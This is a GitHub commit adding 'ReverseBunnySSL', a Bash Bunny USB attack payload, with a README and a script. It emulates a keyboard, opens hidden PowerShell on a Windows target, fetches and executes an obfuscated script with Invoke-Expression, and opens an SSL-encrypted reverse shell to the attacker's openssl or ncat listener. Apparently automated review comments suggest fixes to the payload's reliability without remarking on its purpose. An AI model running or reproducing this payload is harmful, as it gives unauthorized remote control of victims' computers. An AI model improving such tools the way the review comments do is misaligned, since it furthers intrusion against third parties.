Uploaded ReverseBunnySSL

0iphor13 2022-05-08 13:24:35 +02:00 committed by GitHub
parent eb5600aeab
commit 86c1523a77
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
4 changed files with 75 additions and 0 deletions

File diff suppressed because one or more lines are too long

@ -0,0 +1,30 @@
**Title: ReverseBunnySSL**
<p>Author: 0iphor13<br>
OS: Windows<br>
Version: 1.2<br>
For input and inspiration - Thanks to: Cribbit, sebkinne</p>
**What is ReverseBunnySSL?**
#
<p>ReverseBunnySSL gets you remote access to your target in seconds.<br>
Unlike ReverseBunny, ReverseBunnySSL offers encrypted traffic via OpenSSL.</p>
**Instruction:**
<p>!!!Insert the IP of your attacking machine & PORT into the payload!<br>
1. Create key.pem & cert.pem like so: <br>
> openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes<br>
It will ask for information about the certificate - Insert whatever you want.<br>
2. For catching the shell you need to start a listener, which supports encrypted traffic.<br>
I recommend openssl itself or ncat - Example syntax for both:<br>
> `openssl s_server -quiet -key key.pem -cert cert.pem -port [Port Number]` <br>
> `ncat --listen -p [Port Number] --ssl --ssl-cert cert.pem --ssl-key key.pem`</p>
3. Plug in Bunny, it will create a web server, and uses Invoke-Expression to execute the shell.
**Disclaimer: Because of obfuscation, it may take some time until the shell is fully executed by powershell**
![alt text](https://github.com/0iphor13/omg-payloads/blob/master/payloads/library/remote_access/ReverseCableSSL/CreateCert.png)
![alt text](https://github.com/0iphor13/bashbunny-payloads/blob/master/payloads/library/remote_access/ReverseBunnySSL/Startscreen.jpg)
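
Review bot: The first image link at the end of this README points at a different repository and payload (`omg-payloads/.../ReverseCableSSL/CreateCert.png`) rather than a file in this payload's directory, and the commit shows only one binary image being added, so the README depends on content outside this change. Reference an image shipped with ReverseBunnySSL by relative path and replace both `alt text` placeholders with real descriptions. Step 3 also sits after the closing `</p>` on the ncat line, so it will render differently from steps 1 and 2, and the `openssl req` command in step 1 is not in backticks like the two listener commands.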

Binary file not shown.

@ -0,0 +1,44 @@
#!/bin/bash
#
# Title: ReverseBunnySSL
# Description: Get remote access, using an obfuscated powershell reverse shell.
# Author: 0iphor13
# Version: 1.2
# Category: Remote_Access
# Attackmodes: HID, RNDIS_ETHERNET
LED SETUP
ATTACKMODE RNDIS_ETHERNET HID
GET SWITCH_POSITION
GET HOST_IP
cd /root/udisk/payloads/$SWITCH_POSITION/
# starting server
LED SPECIAL
# disallow outgoing dns requests so the server is accessible immediately
iptables -A OUTPUT -p udp --dport 53 -j DROP
python -m SimpleHTTPServer 80 &
# wait until port is listening
while ! nc -z localhost 80; do sleep 0.2; done
# attack commences
Q DELAY 1500
Q GUI r
Q DELAY 500
Q STRING "powershell -NoP -NonI -w hidden"
Q DELAY 500
Q ENTER
Q DELAY 500
#Insert attacking IP & port below
Q STRING "\$I='0.0.0.0';\$P=4444;"
Q DELAY 250
Q STRING "iex (New-Object Net.WebClient).DownloadString(\"http://$HOST_IP/RBSSL.ps1\")"
Q DELAY 200
Q ENTER
LED FINISH
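
Review bot: The `cd /root/udisk/payloads/$SWITCH_POSITION/` line is unquoted and its result is never checked, yet the following `python -m SimpleHTTPServer 80 &` serves the current directory; if the `cd` fails, the server exposes whatever directory the script started in. Quote the path and stop the payload when the `cd` fails. The `iptables -A OUTPUT -p udp --dport 53 -j DROP` rule and the background server are also never removed before `LED FINISH`, so DNS stays blocked and port 80 stays open on the device after the payload reports completion; add a cleanup step. The header should state that `SimpleHTTPServer` requires Python 2, and nothing guards against the `0.0.0.0` placeholder being left unedited.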